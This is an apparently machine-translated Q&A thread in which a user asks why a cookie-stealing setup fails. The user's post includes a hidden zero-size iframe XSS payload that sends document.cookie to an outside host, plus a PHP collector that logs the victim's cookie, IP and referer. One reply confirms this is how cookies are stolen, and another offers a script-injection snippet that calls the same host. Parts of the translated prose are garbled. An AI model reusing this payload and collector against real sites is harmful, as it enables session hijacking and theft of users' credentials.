在一個單獨的域

<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>

然後傳遞一個iframe中的document.cookie從到PHP PHP文件：在一個單獨的域

<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$date=date("j F, Y, g:i a");; 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('logs.html', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br> <br> <br>'); 
fclose($fp); 
header ("Location: http://www.xxx.com"); 
?>

logs.html記錄比cookie-爲什麼其他的一切嗎？我測試了我的網站正在通過調用：document.cookie標籤來正確顯示cookie，所以其他內容已經啓動。請指出我的愚蠢！

來源

2011-08-19 Maxi

我認爲這是因爲相同的原產地政策。

，否則這將是太容易偷別人的餅乾:)

http://en.wikipedia.org/wiki/Same_origin_policy

來源

2011-08-19 17:25:59 PeeHaa

沒有CORS違規。這是_exactly_你如何竊取某人的cookie。 – Halcyon

請注意，「document.cookie」作爲查詢字符串的一部分傳遞。 – Halcyon

爲什麼要這麼做？反正我已經運行到這個鏈接：http://www.15seconds.com/issue/971108.htm回長..看看它的對你有用

，或者你可以按如下嘗試使用此JS：

<script type="text/javascript"> 
    var script=document.createElement('script'); 
    script.setAttribute("type","text/javascript"); 
    script.setAttribute("src", 'http://xxx.com/ajaxHandler?getCookie&callback=passCookie'); 
    document.getElementsByTagName("head")[0].appendChild(newfile); 
</script>

和頁面xxx.com/ajaxHandler?getCookie可以這樣做：

passCookie({'name':'mycookie', 'value':'myvalue'});

來源

2011-08-19 17:33:10 Baz1nga

在一個單獨的域

回答

相關問題